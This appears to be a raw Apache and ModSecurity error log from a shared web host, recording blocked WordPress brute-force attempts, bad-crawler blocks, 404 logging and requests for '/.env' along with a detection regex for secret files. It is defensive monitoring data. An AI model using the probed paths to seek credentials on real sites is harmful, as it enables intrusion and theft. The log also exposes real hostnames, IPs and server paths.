[Tue May 26 14:18:29.472762 2026] [security2:error] [pid 598542:tid 598741] [client 57.141.2.13:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVeXf4iWyZxnXeAW3JiEwAAAEU"]
[Tue May 26 14:18:31.219301 2026] [security2:error] [pid 598542:tid 598712] [client 66.84.95.244:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahVeX_4iWyZxnXeAW3JiRwAAACg"], referer: https://www.anujtradingco.com/
[Tue May 26 14:18:31.692216 2026] [security2:error] [pid 598542:tid 598730] [client 57.141.2.17:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVeX_4iWyZxnXeAW3JiUAAAADo"]
[Tue May 26 14:18:31.849695 2026] [security2:error] [pid 598542:tid 598574] [remote 45.250.255.226:48206] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 226.255.250.45.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "atreegroup.com"] [uri "/wp-login.php"] [unique_id "ahVeX_4iWyZxnXeAW3JiXgAAah8"]
[Tue May 26 14:18:32.226365 2026] [security2:error] [pid 598542:tid 598682] [client 202.141.30.10:65349] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 10.30.141.202.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVeYP4iWyZxnXeAW3JiaQAAAAo"]
[Tue May 26 14:18:32.226562 2026] [security2:error] [pid 598542:tid 598682] [client 202.141.30.10:65349] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVeYP4iWyZxnXeAW3JiaQAAAAo"]
[Tue May 26 14:18:32.971305 2026] [security2:error] [pid 598542:tid 598754] [client 167.160.69.203:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVeYP4iWyZxnXeAW3JifgAAAFI"], referer: https://anujtradingco.com
[Tue May 26 14:18:33.967616 2026] [security2:error] [pid 598542:tid 598695] [client 57.141.2.44:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVeYf4iWyZxnXeAW3JijwAAABc"]
[Tue May 26 14:18:35.339541 2026] [security2:error] [pid 598542:tid 598754] [client 146.174.168.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVeYv4iWyZxnXeAW3JitwAAAFI"]
[Tue May 26 14:18:35.810335 2026] [security2:error] [pid 598542:tid 598787] [client 66.84.95.244:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVeY_4iWyZxnXeAW3Ji2wAAAHM"], referer: https://www.anujtradingco.com/top-deejay-headphones/?unapproved=1242947&moderation-hash=b208e265a7d24a66ce12312544d00da2
[Tue May 26 14:18:36.159319 2026] [security2:error] [pid 598542:tid 598721] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVeY_4iWyZxnXeAW3Ji3QAAADE"]
[Tue May 26 14:18:38.327760 2026] [security2:error] [pid 598542:tid 598704] [client 57.141.2.60:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVeZf4iWyZxnXeAW3JjIQAAACA"]
[Tue May 26 14:18:38.469401 2026] [security2:error] [pid 598542:tid 598732] [client 131.255.33.129:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "www.glorodrc.com"] [uri "/index.php"] [unique_id "ahVeZf4iWyZxnXeAW3JjJQAAADw"]
[Tue May 26 14:18:38.470203 2026] [security2:error] [pid 598542:tid 598708] [client 131.255.33.129:55773] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "www.glorodrc.com"] [uri "/index.php"] [unique_id "ahVeZf4iWyZxnXeAW3JjGgAAACQ"]
[Tue May 26 14:18:40.499763 2026] [security2:error] [pid 598542:tid 598773] [client 57.141.2.27:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVeaP4iWyZxnXeAW3JjXQAAAGU"]
[Tue May 26 14:18:42.730694 2026] [security2:error] [pid 598542:tid 598732] [client 57.141.2.39:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVeav4iWyZxnXeAW3JjowAAADw"]
[Tue May 26 14:18:43.134478 2026] [security2:error] [pid 598542:tid 598713] [client 202.141.30.10:65332] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 10.30.141.202.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVeav4iWyZxnXeAW3JjtwAAACk"]
[Tue May 26 14:18:43.134586 2026] [security2:error] [pid 598542:tid 598713] [client 202.141.30.10:65332] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVeav4iWyZxnXeAW3JjtwAAACk"]
[Tue May 26 14:18:44.414966 2026] [security2:error] [pid 598542:tid 598746] [client 57.141.2.55:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVea_4iWyZxnXeAW3Jj2wAAAEo"]
[Tue May 26 14:18:46.576260 2026] [security2:error] [pid 598542:tid 598691] [client 57.141.2.56:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVebv4iWyZxnXeAW3JkGAAAABM"]
[Tue May 26 14:18:47.098378 2026] [security2:error] [pid 598542:tid 598687] [client 114.119.138.235:60585] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "bhavisharchitects.com"] [uri "/team/bruce-robinson-2/"] [unique_id "ahVeb_4iWyZxnXeAW3JkPAAAAA8"], referer: https://bhavisharchitects.com/team/bruce-robinson-2/
[Tue May 26 14:18:47.338097 2026] [security2:error] [pid 598542:tid 598674] [client 151.240.182.52:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahVeb_4iWyZxnXeAW3JkQgAAAAI"], referer: https://www.anujtradingco.com/
[Tue May 26 14:18:48.200360 2026] [security2:error] [pid 598542:tid 598773] [client 151.240.182.52:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVecP4iWyZxnXeAW3JkXQAAAGU"], referer: https://www.anujtradingco.com/top-deejay-headphones/?unapproved=1206895&moderation-hash=dbe58b9d934f85ac97b45a4b5eca95e6
[Tue May 26 14:18:49.590705 2026] [security2:error] [pid 598542:tid 598726] [client 57.141.2.46:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVecf4iWyZxnXeAW3JkhgAAADY"]
[Tue May 26 14:18:49.802419 2026] [security2:error] [pid 598542:tid 598675] [client 205.185.124.118:56234] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 118.124.185.205.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.cti.hn"] [uri "/wp-login.php"] [unique_id "ahVecf4iWyZxnXeAW3JkkAAAAAM"]
[Tue May 26 14:18:50.904650 2026] [security2:error] [pid 598542:tid 598783] [client 151.240.182.52:40006] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "anujtradingco.com"] [uri "/wp-login.php"] [unique_id "ahVecv4iWyZxnXeAW3JkogAAAG8"], referer: https://anujtradingco.com
[Tue May 26 14:18:51.671583 2026] [security2:error] [pid 598542:tid 598740] [client 57.141.2.49:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVec_4iWyZxnXeAW3JkvAAAAEQ"]
[Tue May 26 14:18:53.809637 2026] [security2:error] [pid 598542:tid 598692] [client 57.141.2.51:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVedf4iWyZxnXeAW3Jk_wAAABQ"]
[Tue May 26 14:18:53.911689 2026] [security2:error] [pid 598542:tid 598728] [client 202.141.30.10:65469] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 10.30.141.202.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVedf4iWyZxnXeAW3JlDAAAADg"]
[Tue May 26 14:18:53.911823 2026] [security2:error] [pid 598542:tid 598728] [client 202.141.30.10:65469] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVedf4iWyZxnXeAW3JlDAAAADg"]
[Tue May 26 14:18:54.381593 2026] [security2:error] [pid 598542:tid 598790] [client 176.65.139.234:36238] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "mail.digitalgerminate.com"] [uri "/.env"] [unique_id "ahVedv4iWyZxnXeAW3JlHAAAAHY"]
[Tue May 26 14:18:54.419640 2026] [proxy:error] [pid 598542:tid 598605] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:18:54.419687 2026] [proxy_http:error] [pid 598542:tid 598605] [remote 176.65.139.232:0] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:18:54.420273 2026] [proxy:error] [pid 598542:tid 598605] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:18:54.420307 2026] [proxy_http:error] [pid 598542:tid 598605] [remote 176.65.139.232:0] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:18:55.933513 2026] [security2:error] [pid 598542:tid 598725] [client 57.141.2.19:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVed_4iWyZxnXeAW3JlPgAAADU"]
[Tue May 26 14:18:57.753524 2026] [proxy:error] [pid 598542:tid 598624] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:18:57.753588 2026] [proxy_http:error] [pid 598542:tid 598624] [remote 176.65.139.237:0] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:18:57.754169 2026] [proxy:error] [pid 598542:tid 598624] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:18:57.754201 2026] [proxy_http:error] [pid 598542:tid 598624] [remote 176.65.139.237:0] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:18:57.764240 2026] [security2:error] [pid 598542:tid 598668] [remote 176.65.139.234:0] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "autodiscover.digitalgerminate.com"] [uri "/.env"] [unique_id "ahVeef4iWyZxnXeAW3JlfwAAR30"]
[Tue May 26 14:18:58.107907 2026] [security2:error] [pid 598542:tid 598692] [client 57.141.2.46:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVeef4iWyZxnXeAW3JlfQAAABQ"]
[Tue May 26 14:18:58.786415 2026] [security2:error] [pid 598542:tid 598789] [client 185.191.171.12:41062] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/list/"] [unique_id "ahVeev4iWyZxnXeAW3JlpwAAAHU"]
[Tue May 26 14:18:58.786560 2026] [security2:error] [pid 598542:tid 598789] [client 185.191.171.12:41062] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/events/list/"] [unique_id "ahVeev4iWyZxnXeAW3JlpwAAAHU"]
[Tue May 26 14:18:59.123265 2026] [security2:error] [pid 598542:tid 598720] [client 202.76.176.235:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVeev4iWyZxnXeAW3JloAAAADA"]
[Tue May 26 14:19:00.291804 2026] [security2:error] [pid 598542:tid 598793] [client 57.141.2.34:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVee_4iWyZxnXeAW3Jl2AAAAHk"]
[Tue May 26 14:19:02.256612 2026] [security2:error] [pid 598542:tid 598771] [client 57.141.2.29:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVeff4iWyZxnXeAW3JmGgAAAGM"]
[Tue May 26 14:19:03.201870 2026] [security2:error] [pid 598542:tid 598545] [remote 3.208.180.187:34302] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 187.180.208.3.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "vcresco.com"] [uri "/wp-login.php"] [unique_id "ahVef_4iWyZxnXeAW3JmQAAAQwI"]
[Tue May 26 14:19:04.752948 2026] [security2:error] [pid 598542:tid 598683] [client 57.141.2.15:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVegP4iWyZxnXeAW3JmXAAAAAs"]
[Tue May 26 14:19:04.888868 2026] [security2:error] [pid 598542:tid 598688] [client 202.141.30.10:65313] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 10.30.141.202.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVegP4iWyZxnXeAW3JmbgAAABA"]
[Tue May 26 14:19:04.889511 2026] [security2:error] [pid 598542:tid 598688] [client 202.141.30.10:65313] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVegP4iWyZxnXeAW3JmbgAAABA"]
[Tue May 26 14:19:05.173028 2026] [security2:error] [pid 598542:tid 598652] [remote 14.161.17.36:52986] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 36.17.161.14.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "hassina-foundation.com"] [uri "/wp-login.php"] [unique_id "ahVegP4iWyZxnXeAW3JmcgAANW0"]
[Tue May 26 14:19:06.378731 2026] [security2:error] [pid 598542:tid 598750] [client 57.141.2.27:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVegf4iWyZxnXeAW3JmiAAAAE4"]
[Tue May 26 14:19:09.194173 2026] [security2:error] [pid 598542:tid 598745] [client 57.141.2.18:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVehP4iWyZxnXeAW3JmygAAAEk"]
[Tue May 26 14:19:11.681659 2026] [security2:error] [pid 598542:tid 598797] [client 202.141.83.254:19943] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 254.83.141.202.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahVeh_4iWyZxnXeAW3JnEAAAAH0"]
[Tue May 26 14:19:11.681781 2026] [security2:error] [pid 598542:tid 598797] [client 202.141.83.254:19943] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahVeh_4iWyZxnXeAW3JnEAAAAH0"]
[Tue May 26 14:19:13.510557 2026] [security2:error] [pid 598542:tid 598749] [client 43.173.181.67:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVeif4iWyZxnXeAW3JnPQAAAE0"]
[Tue May 26 14:19:15.717290 2026] [security2:error] [pid 598542:tid 598675] [client 202.141.30.10:65298] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 10.30.141.202.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVei_4iWyZxnXeAW3JnfwAAAAM"]
[Tue May 26 14:19:15.717437 2026] [security2:error] [pid 598542:tid 598675] [client 202.141.30.10:65298] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVei_4iWyZxnXeAW3JnfwAAAAM"]
[Tue May 26 14:19:15.777754 2026] [security2:error] [pid 598542:tid 598707] [client 57.141.2.30:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVei_4iWyZxnXeAW3JndgAAACM"]
[Tue May 26 14:19:17.405226 2026] [security2:error] [pid 598542:tid 598700] [client 57.141.2.51:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVejP4iWyZxnXeAW3JnngAAABw"]
[Tue May 26 14:19:18.479133 2026] [security2:error] [pid 598542:tid 598754] [client 23.236.243.184:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahVejv4iWyZxnXeAW3JnwgAAAFI"], referer: https://www.anujtradingco.com/
[Tue May 26 14:19:18.903531 2026] [security2:error] [pid 598542:tid 598775] [client 23.236.243.184:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVejv4iWyZxnXeAW3JnzwAAAGc"], referer: https://www.anujtradingco.com/top-deejay-headphones/?unapproved=1230859&moderation-hash=2aac02f82ca332a981ba185237eedd5a
[Tue May 26 14:19:19.817248 2026] [security2:error] [pid 598542:tid 598603] [remote 74.7.241.58:59302] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 58.241.7.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.billing.mosykay.com"] [uri "/app/password/reset"] [unique_id "ahVej_4iWyZxnXeAW3Jn6wAAHDw"], referer: https://www.billing.mosykay.com/app/password/reset?path=/home1/taote1zo/www/afstpaul.org/wp-content/plugins/the-events-calendar/common/src/Common/Site_Health/Fields
[Tue May 26 14:19:20.004605 2026] [security2:error] [pid 598542:tid 598676] [client 57.141.2.17:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVej_4iWyZxnXeAW3Jn4wAAAAQ"]
[Tue May 26 14:19:20.727949 2026] [core:crit] [pid 598542:tid 598689] (13)Permission denied: [client 66.249.70.136:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
[Tue May 26 14:19:20.912408 2026] [core:crit] [pid 598542:tid 598745] (13)Permission denied: [client 66.249.70.137:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
[Tue May 26 14:19:20.997263 2026] [security2:error] [pid 598542:tid 598705] [client 202.141.83.254:53995] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 254.83.141.202.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahVekP4iWyZxnXeAW3JoDAAAACE"]
[Tue May 26 14:19:20.997381 2026] [security2:error] [pid 598542:tid 598705] [client 202.141.83.254:53995] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahVekP4iWyZxnXeAW3JoDAAAACE"]
